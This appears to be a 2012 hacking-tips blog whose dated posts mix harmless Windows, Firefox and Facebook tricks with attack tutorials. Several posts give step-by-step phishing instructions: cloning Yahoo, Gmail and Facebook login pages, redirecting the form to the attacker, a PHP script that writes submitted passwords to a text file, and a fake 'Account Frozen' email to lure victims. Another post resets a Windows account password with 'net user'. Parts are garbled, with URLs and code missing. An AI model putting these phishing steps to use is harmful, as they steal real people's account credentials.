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Wednesday 19 December 2012

Hacking a computer's password

{1} open command prompt.
{2}Type net user:
{3}Type net user "Username"(Marked in green)

{4}Type net user "Username" *

{5}Enter password you want to change it to!


You can Enable This Option by few simple steps:

Step 1: Go to your Facebook Privacy Settings

Step 2: Simple go to “Privacy Settings > Timeline and Tagging > Review posts friends tag you in before they appear on your Timeline” and Set “On” This option.

Step 3:Click on Edit settings of Timeline and Tagging Option.

Step 4: You will see an option “Review posts friends tag you in before they appear on your Timeline”, Now click on “Off” and set it to “On” to enable this feature for you.

Step 5:And Now Finally Enable this Feature.

After saving the changes if someone tag you on facebook then you will get Options to either Approve or Disapprove the posts. These posts will not visible on your Timeline until you manually approve the

Increase Ur Internet Speed Up To 300%(Firefox Only)

This is a short trick on how to increase your internet 300% Faster or higher.

So That You Can =>

* Increase your browsing experience
* Play online games LAG free
* Load videos almost instantly
* Turn your slow internet connection into Broadband DSL or even T1
* Download anything faster with our “intelligent packet configurator”
* Increase Speeds Up To 375% Faster!

PLEASE NOTE: Only works for Mozilla Firefox
1) Open Mozilla Firefox.

2) In address bar type: “about:config

3)Look for were it says “network.http.pipelining” to TRUE
(Double Click it until it says TRUE)

4)Look for “network.http.proxy.pipelining” to TRUE
(Same way as stated above)

5) Now. Right-Click Anywhere then click “Create New” Then “Integer”. Name it “nglayout.initialpaint.delay
Then Click Ok, then put the number “0″ (Zero) in the next box

6) Click OK,

7) Restart Firefox.
Feel The Difference in Speed

Make your pc to say welcome message at startup

1) Create a new notepad file.

2) Type the following code in it Dim Speaks, Speech

Speaks="Welcome to your PC"

Set Speech=CreateObject


Speech.Speak Speaks Note: Put you own message in

the place of "welcome to you

pc" in the above code

3) Save this file as

welcome.vbs where to paste this file

For windows 7

C: Users- Username- Appdata-

Roaming- Microsoft-

Windows- Startmenu-

Programs- Startup For Windows XP

C: documents and settings- all

users- Start menu- Programs-


njoy guyzz if u like dis post

Tuesday 18 December 2012

How to hack Gmail,Yahoo,Hotmail,Orkut or any other

First of all you need to create an account in a form handling service. In the registration form enter your email address in the field “Where to send Data” and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be and for google it is After registering you will get an email from the web form designer with your form id.Now follow the following steps :

  1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto
  2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
  3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
  4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=“post”action=“” autocomplete=“off”name=“login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
  5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
    put the following code after placing your form id:
<form name=“New_Form” action=“ Form ID Here” method=“post” enctype=“application/x-www-form-urlencoded”onsubmit=“return New_Form_CF();”>
Now Save the yahoofake.html.
To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.
First of all upload your page using some free webhosting services.
Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site”. Now select your site name as
You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.
Now send a fake mail from to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.
After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.
Good Luck !

Hack A Facebook Account By Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating a counterfeit website that looks like a real (and trusted) site. It is a hacker technique of "fishing" for passwords and other secret financial info.

So now i am starting to show you how to hack someone by phishing...

STEP 1: Go to
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

   STEP 2: Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

You have to change two things in that code..first of all you have to change method from POST to You can see in picture.
and secondly you have to change ACTION from"
to "next.php"

Save the document as index.html
and Change the file type as All Files.

Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
header("Location: ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

save this file as "next.php"
        Step 4:open the notepad and Now create a blank file and named it as  "pswrds.txt".
Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"
Now we have to upload this three files on a php web hosting service.
many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.
I found On internet. , is an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms.
So now lets come to topic again...

STEP 5: Go to on 
and click on sign up. and select any domain name as i mentioned in image.

:After doing above steps you have to verify your mail account that you used at the time of signup process.Verify your mail account by clicking the link as you can see in picture.

:Click on the site link which is shown under DOMAIN section to go to your control panel alternativly You can go to
fake page uploading.

: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager underFiles and log into it.

After logging to Your File manager Section. Now Click on the Public_htmldirectory.

 STEP 10Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds.txt).

STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

STEP 12: To Find Your Phishing Site Link or Url Please Refer To below Image.

STEP 13Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.

Monday 17 December 2012

►►How To Hide Computer's Partition (Disk Drive) And A Folder.◄◄

Sometimes We Do Have Some Personal Data Which We
Don't Want To Share....!
So Here Is A Very Easy, Useful Way To Make Your Data Private.

1. How To Hide Disk Drive.

Here's an easy step by step procedure how to hide any partition/drive:
1. Go to Start > run > type "diskpart".
A DOS window will appear with following discription.DISKPART>
2. Then type "list volume"The result will look like : ------
Volume ### Ltr Label Fs Type Size Status Info--------------- --- -------- ---- ------ ---- ------ ----
Volume 0 F CD-ROM
Volume 1 C Window_XP NTFS Partition 7000MB Healthy SystemVolume 2 D Softwares NTFS Partition 8000MB Healthy
Volume 3 E Songs NTFS Partition 8000MB Healthy3.
Suppose u wanna hide drive E then type "select volume 3". Then a message will appear in same windows { Volume 3 is the selected volume}
4. Now type "remove letter E". Now a message will come { DiskpartRemoved the Drive letter }sometime it requires the reboot the computer. Diskpart will remove theletter. Windows XP is not having capabilty to identify the unknown volume.Your Data is safe now from all unauthorized users. To access the content of hidden Drive repeat the process mentioned above. But in4th step replace " remove" to "assign" i mean type "assign letter E"


2.How To Hide A Folder With CMD

Go To Start>Run>Type "cmd"

Dos Window Will Be Open...
Suppose u wanna hide a Folder Name "xyz"
then type "Attrib" "xyz" "+h r+ +s"
Now Press Enter.
You Have Done...
To Access The Hidden Folder
Type The Name Of Folder In Address Bar Or In Run Command.

To Deactivate It Follow Same procedure just Replace The "+" (Plus) With "-" (Minus")

Sunday 16 December 2012


The first hacker in the world - Jhon Drapper

Top 5 Computer Hackers Ever

1. Kevin Mitnick
Kevin Mitnick is a most famous hacker. He is the author of two books The Art of Deception The Art of Intrusion. He damaged some Communication networks like Nokia, Motorola and Sun Microsystem etc. Kevin Mitnick has damaged DEC systems source code [Digital Equipment Corporation has spent around $160,000 in cleanup the DEC systems].  To to win a bet he occupied administration privileges to IBM Computers at the Computer Learning center in LA [Los Angeles] .

2. Adrian Lamo
Adrian Lamo is a Grey Hat Hacker. Using his hacking skill he hacked many computer networks like The New York Time, Yahoo, Microsoft .

3. Gary Mckinnon
Gary Mckinnon is a Biggest Military Computer Hacker of all time. In one interview Gary Mckinnon said "Hacked into US military computer systems looking for information about UFO's". He Broken security systems of NASA and Pentagon And using his hacking skill he hacked 97 Computer systems [It damaged around $700,000 to the society].
Source: BBC News

4. Robert Tappan Morris
Robert Tappan Morris is Created the first Computer worm on the Internet in 1988 and named it asMorris WormRobert Tappan Morris now working as Professor at MIT CS and Artificial Intelligence Laboratory.

5. Jonathan James
Jonathan James is an American hacker. He damaged NASA Systems, It costed $41,000 to fix the systems. 
Jonathan stealed software from NASA It worth $1.7 Million.